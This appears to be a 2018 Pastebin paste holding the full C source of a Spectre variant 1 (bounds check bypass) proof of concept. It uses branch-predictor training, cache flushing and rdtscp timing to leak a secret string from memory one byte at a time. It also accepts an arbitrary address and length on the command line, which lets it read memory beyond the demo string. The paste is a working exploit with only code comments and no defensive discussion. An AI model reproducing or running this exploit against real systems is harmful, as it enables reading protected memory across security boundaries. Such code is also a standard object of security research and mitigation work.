Guest User

Untitled

a guest
Jan 4th, 2018
132
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. #include <stdio.h>
  2. #include <stdlib.h>
  3. #include <stdint.h>
  4. #ifdef _MSC_VER
  5. #include <intrin.h>
  6. /* for rdtscp and clflush */
  7. #pragma optimize("gt",on)
  8. #else
  9. #include <x86intrin.h>
  10. /* for rdtscp and clflush */
  11. #endif
  12. /********************************************************************
  13. Victim code.
  14. ********************************************************************/
  15. unsigned int array1_size = 16;
  16. uint8_t unused1[64];
  17. uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
  18. uint8_t unused2[64];
  19. uint8_t array2[256 * 512];
  20. char *secret = "The Magic Words are Squeamish Ossifrage.";
  21. uint8_t temp = 0;
  22.  
  23. /* Used so compiler won’t optimize out victim_function() */
  24. void victim_function(size_t x) {
  25.     if (x < array1_size) {
  26.         temp &= array2[array1[x] * 512];
  27.     }
  28. }
  29. /********************************************************************
  30. Analysis code
  31. ********************************************************************/
  32. #define CACHE_HIT_THRESHOLD (80) /* assume cache hit if time <= threshold */
  33.  
  34. /* Report best guess in value[0] and runner-up in value[1] */
  35. void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
  36.     static int results[256];
  37.     int tries, i, j, k, mix_i, junk = 0;
  38.     size_t training_x, x;
  39.     register uint64_t time1, time2;
  40.     volatile uint8_t *addr;
  41.     for (i = 0; i < 256; i++)
  42.         results[i] = 0;
  43.     for (tries = 999; tries > 0; tries--) {
  44.         /* Flush array2[256*(0..255)] from cache */
  45.         for (i = 0; i < 256; i++)
  46.             _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */
  47.        
  48.         /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
  49.         training_x = tries % array1_size;
  50.         for (j = 29; j >= 0; j--) {
  51.             _mm_clflush(&array1_size);
  52.             for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */
  53.            
  54.             /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
  55.             /* Avoid jumps in case those tip off the branch predictor */
  56.             x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
  57.             x = (x | (x >> 16));         /* Set x=-1 if j&6=0, else x=0 */
  58.             x = training_x ^ (x & (malicious_x ^ training_x));
  59.  
  60.             /* Call the victim! */
  61.             victim_function(x);
  62.         }
  63.        
  64.         /* Time reads. Order is lightly mixed up to prevent stride prediction */
  65.         for (i = 0; i < 256; i++) {
  66.             mix_i = ((i * 167) + 13) & 255;
  67.             addr = &array2[mix_i * 512];
  68.             time1 = __rdtscp(&junk);            /* READ TIMER */
  69.             junk = *addr;                       /* MEMORY ACCESS TO TIME */
  70.             time2 = __rdtscp(&junk) - time1;    /* READ TIMER & COMPUTE ELAPSED TIME */
  71.            
  72.             if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
  73.                 results[mix_i]++;               /* cache hit - add +1 to score for this value */
  74.         }
  75.        
  76.         /* Locate highest & second-highest results results tallies in j/k */
  77.         j = k = -1;
  78.         for (i = 0; i < 256; i++) {
  79.             if (j < 0 || results[i] >= results[j]) {
  80.                 k = j;
  81.                 j = i;
  82.             }
  83.             else if (k < 0 || results[i] >= results[k]) {
  84.                 k = i;
  85.             }
  86.         }
  87.        
  88.         if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
  89.             break;  /* Clear success if best is > 2*runner-up + 5 or 2/0) */
  90.        
  91.     }
  92.     results[0] ^= junk; /* use junk so code above won’t get optimized out*/
  93.     value[0] = (uint8_t)j;
  94.     score[0] = results[j];
  95.     value[1] = (uint8_t)k;
  96.     score[1] = results[k];
  97. }
  98.  
  99. int main(int argc, const char **argv) {
  100.     size_t malicious_x=(size_t)(secret-(char*)array1);  /* default for malicious_x */
  101.     int i, score[2], len=40;
  102.     uint8_t value[2];
  103.    
  104.     for (i = 0; i < sizeof(array2); i++)
  105.         array2[i] = 1;  /* write to array2 so in RAM not copy-on-write zero pages */
  106.    
  107.     if (argc == 3) {
  108.         sscanf(argv[1], "%p", (void**)(&malicious_x));
  109.         malicious_x -= (size_t)array1;  /* Convert input value into a pointer */
  110.         sscanf(argv[2], "%d", &len);
  111.     }
  112.    
  113.     printf("Reading %d bytes:\n", len);
  114.     while (--len >= 0) {
  115.         printf("Reading at malicious_x = %p... ", (void*)malicious_x);
  116.         readMemoryByte(malicious_x++, value, score);
  117.         printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
  118.         printf("0x%02X=’%c’ score=%d    ", value[0],
  119.         (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
  120.        
  121.         if (score[1] > 0)
  122.             printf("(second best: 0x%02X score=%d)", value[1], score[1]);
  123.         printf("\n");
  124.     }
  125.     return (0);
  126. }
RAW Paste Data